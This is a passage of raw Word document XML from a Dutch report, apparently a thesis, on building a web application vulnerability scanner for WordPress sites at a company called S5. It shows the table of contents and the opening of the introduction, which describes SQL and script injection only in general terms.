                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="57E790BE" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Aanleiding</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="69A8ADFD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Probleemstelling</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>7</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0727A6B8" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.3 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Scope</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>9</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17339239" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.4 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Onderzoek opzet</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>10</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="307D6315" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">1.5 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Project context</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>11</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="554EF651" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r w:rsidRPr="006B0926">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>2 Business Context</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>13</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="514C6B86" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">2.1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Stakeholders en Business doelen</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>13</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7BC5D54F" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">2.2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Doelgroep</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>17</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6F952B89" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r w:rsidRPr="00D96DB8">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>3 Onderzoek</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>23</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="48B42014" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">3.1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Inleiding</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>23</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="413F7C1A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t xml:space="preserve">3.2 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>Web Security en de kwetsbaarheden</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:tab/>
                        <w:t>24</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3B88CD4F" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>3.3 Webapplicatie scanner</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00886DD6">
                        <w:t>32</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A391DB4" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>3.4 Technologie</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>39</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4C35393D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="000826D9" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>4 Concept</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>44</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="30E1B180" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.1 Concept van het systeem</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>45</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D635B42" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.2 Pandora CMS Extensie</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>47</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="47B0D20F" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.3 Admin Paneel</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>49</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6577768B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.4 API</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>50</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="330B9E52" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>4.5 Webapplicatie scanner</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>51</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5FC571E0" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="000826D9" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>5 Eindproduct</w:t>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="000826D9">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>66</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="34AE8028" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.1 Pandora CMS Extensie</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>67</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="257759F2" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.2 Admin Paneel</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>69</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6EC26377" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.3 Rapport</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>71</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="326EC22B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.4 Email Service</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>73</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5E1BC1DD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE"/>
                    <w:p w14:paraId="69E917BF" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EA73F" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="34FBEE8D" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="2B7DEC60" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="2D6BD48C" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="0E200DB2" w14:textId="1CC5BB41" w:rsidR="00120248" w:rsidRPr="00CA3CAE" w:rsidRDefault="00120248" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:sectPr w:rsidR="00120248" w:rsidRPr="00CA3CAE" w:rsidSect="00D371DB">
          <w:headerReference w:type="default" r:id="rId17"/>
          <w:headerReference w:type="first" r:id="rId18"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E076231" w14:textId="136E35B9" w:rsidR="00EF3E0F" w:rsidRDefault="00BD5AD1" w:rsidP="00EF3E0F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="-1417"/>
        <w:sectPr w:rsidR="00EF3E0F" w:rsidSect="00D371DB">
          <w:headerReference w:type="first" r:id="rId19"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252271616" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CD12B28" wp14:editId="53B2683D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-943359</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7557135" cy="11084943"/>
                <wp:effectExtent l="0" t="0" r="37465" b="15240"/>
                <wp:wrapNone/>
                <wp:docPr id="471" name="Rectangle 471"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="7557135" cy="11084943"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C5E1B4"/>
                        </a:solidFill>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="C5E2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A7B32" id="Rectangle 471" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-74.25pt;width:595.05pt;height:872.8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" fillcolor="#c5e1b4" strokecolor="#c5e2b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252344320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66BCD40A" wp14:editId="31D5E870">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-198755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>193675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="630555"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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0">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Pr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252278784" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="151DE44E" wp14:editId="060FA84B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-200660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1685290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2854960" cy="9150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2854960"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DFEE0" w14:textId="17FE7127" w:rsidR="002A05E5" w:rsidRPr="007B37A9" w:rsidRDefault="002A05E5"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E44E" id="Text Box 565" o:spid="_x0000_s1040" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-15.8pt;margin-top:132.7pt;width:224.8pt;height:72.0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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="030DFEE0" w14:textId="17FE7127" w:rsidR="002A05E5" w:rsidRPr="007B37A9" w:rsidRDefault="002A05E5"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v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="264CFAF7" w14:textId="4B1A6C2B" w:rsidR="00BD5AD1" w:rsidRDefault="00BD5AD1" w:rsidP="00380DF9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252118016" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11FB22B1" wp14:editId="5DB5D65C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899795</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-601719</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="32" name="Rectangle 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FE0C4" id="Rectangle 32" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.85pt;margin-top:-47.35pt;width:25pt;height:1031.7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3M27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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8A8143" w14:textId="1FA9AB39" w:rsidR="00FA284E" w:rsidRPr="00380DF9" w:rsidRDefault="00380DF9" w:rsidP="00380DF9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00380DF9">
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="006822D8" w:rsidRPr="00380DF9">
        <w:t>Inleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505B3C8B" w14:textId="4D7D2087" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 aanleiding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317E9E33" w14:textId="43CBC331" w:rsidR="001A1E51" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Het</w:t>
      </w:r>
      <w:r w:rsidR="003931CD">
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r w:rsidR="004B20EB">
        <w:t>lgemeen bekent dat</w:t>
      </w:r>
      <w:r w:rsidR="003931CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00223F44">
        <w:t>webapplicaties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kwetsbaarheden hebben waar hackers gebruik van maken door deze te exploiteren. </w:t>
      </w:r>
      <w:r w:rsidR="00AD38DE">
        <w:t>Deze kwetsbaarheden worden veroorzaakt door</w:t>
      </w:r>
      <w:r w:rsidR="008F3614">
        <w:t xml:space="preserve"> een</w:t>
      </w:r>
      <w:r w:rsidR="00AD38DE">
        <w:t xml:space="preserve"> onveilige</w:t>
      </w:r>
      <w:r w:rsidR="008F3614">
        <w:t xml:space="preserve"> codebase</w:t>
      </w:r>
      <w:r w:rsidR="00AD38DE">
        <w:t xml:space="preserve"> en misconfiguratie aan de</w:t>
      </w:r>
      <w:r w:rsidR="00F34A65">
        <w:t xml:space="preserve"> server kant van de applicatie. </w:t>
      </w:r>
      <w:r w:rsidR="00A32097">
        <w:t>Een gros van de webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00CA3422">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A32097">
        <w:t xml:space="preserve"> die nu online sta</w:t>
      </w:r>
      <w:r w:rsidR="00086DE3">
        <w:t xml:space="preserve">an laten input van </w:t>
      </w:r>
      <w:r w:rsidR="00790B32">
        <w:t xml:space="preserve">gebruikers </w:t>
      </w:r>
      <w:r w:rsidR="0047598B">
        <w:t>toe, dit om de gebruiker te kunnen laten communiceren met de server om bijvoorbeeld</w:t>
      </w:r>
      <w:r w:rsidR="009C2996">
        <w:t xml:space="preserve"> voor het opvragen van data uit </w:t>
      </w:r>
      <w:r w:rsidR="0047598B">
        <w:t>de database.</w:t>
      </w:r>
      <w:r w:rsidR="00415C42">
        <w:t xml:space="preserve"> De hackers maken va</w:t>
      </w:r>
      <w:r w:rsidR="009C2996">
        <w:t xml:space="preserve">n deze mogelijkheid gebruik </w:t>
      </w:r>
      <w:r w:rsidR="00415C42">
        <w:t>door code te inj</w:t>
      </w:r>
      <w:r w:rsidR="009C2996">
        <w:t>ecteren die de server zonder</w:t>
      </w:r>
      <w:r w:rsidR="00415C42">
        <w:t xml:space="preserve"> te valideren uitvoert. </w:t>
      </w:r>
      <w:r w:rsidR="003C1BFC">
        <w:t>De codetalen die hiervoor gebruikt kunnen worden zijn SQL</w:t>
      </w:r>
      <w:r w:rsidR="009C2996">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C1BFC">
        <w:t xml:space="preserve"> een database taal en browser </w:t>
      </w:r>
      <w:r w:rsidR="001C6212">
        <w:t xml:space="preserve">script talen </w:t>
      </w:r>
      <w:r w:rsidR="005B7A18">
        <w:t xml:space="preserve">(Javascript, VB). </w:t>
      </w:r>
      <w:r w:rsidR="00D62C59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0083123A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E89C5" w14:textId="4BECD357" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>S5 specialiseert zich in het ontwikkelen van website</w:t>
      </w:r>
      <w:r w:rsidR="009C2996">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>. Hiervoor gebruiken zij de Content Management Systemen (CMS) platformen</w:t>
      </w:r>
      <w:r w:rsidR="00E4355F">
        <w:t xml:space="preserve"> WordPress en Magento, twee CMS-</w:t>
      </w:r>
      <w:r>
        <w:t>platfor</w:t>
      </w:r>
      <w:r w:rsidR="00E4355F">
        <w:t>men die</w:t>
      </w:r>
      <w:r w:rsidR="0020624F">
        <w:t xml:space="preserve"> zoals bijna elke webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00EC208C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> security kwets</w:t>
      </w:r>
      <w:r w:rsidR="00ED262F">
        <w:t>baarheden hebben. Dit geeft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S5 aanleiding genoeg</w:t>
      </w:r>
      <w:r w:rsidR="00ED262F">
        <w:t xml:space="preserve"> om dit probleem te onderzoeken. Dit, o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mdat er altijd een </w:t>
      </w:r>
      <w:r w:rsidR="00ED262F">
        <w:t>kans bestaat dat er een aanval wordt verricht door een cybercriminelen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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maatregelingen </w:t>
      </w:r>
      <w:r w:rsidR="006F00A8">
        <w:t>te nemen</w:t>
      </w:r>
      <w:r w:rsidR="00CA4F09">
        <w:t xml:space="preserve"> tegen deze dreigingen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ik heb de opdracht gekregen om het probleem te onderzoek en een gepaste oplossing als aanbeveling te geven in de vorm van een </w:t>
      </w:r>
      <w:r w:rsidR="007E2066">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dat</w:t>
      </w:r>
      <w:r w:rsidR="00BA5291">
        <w:t xml:space="preserve"> websites</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> op kwetsbaarheden scant.</w:t>
      </w:r>
      <w:r w:rsidR="008D5E7D">
        <w:t xml:space="preserve"> De Magento CMS valt buiten de scope van deze opdracht en </w:t>
      </w:r>
      <w:r w:rsidR="002A6559">
        <w:t xml:space="preserve">zal niet verwerkt worden in de oplevering van de </w:t>
      </w:r>
      <w:r w:rsidR="00732F6E">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="002A6559">
        <w:t xml:space="preserve"> scanner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F682C46" w14:textId="2C092B69" w:rsidR="006822D8" w:rsidRPr="00DA758E" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00DA758E">
        <w:t>1.2</w:t>
      </w:r>
      <w:r>
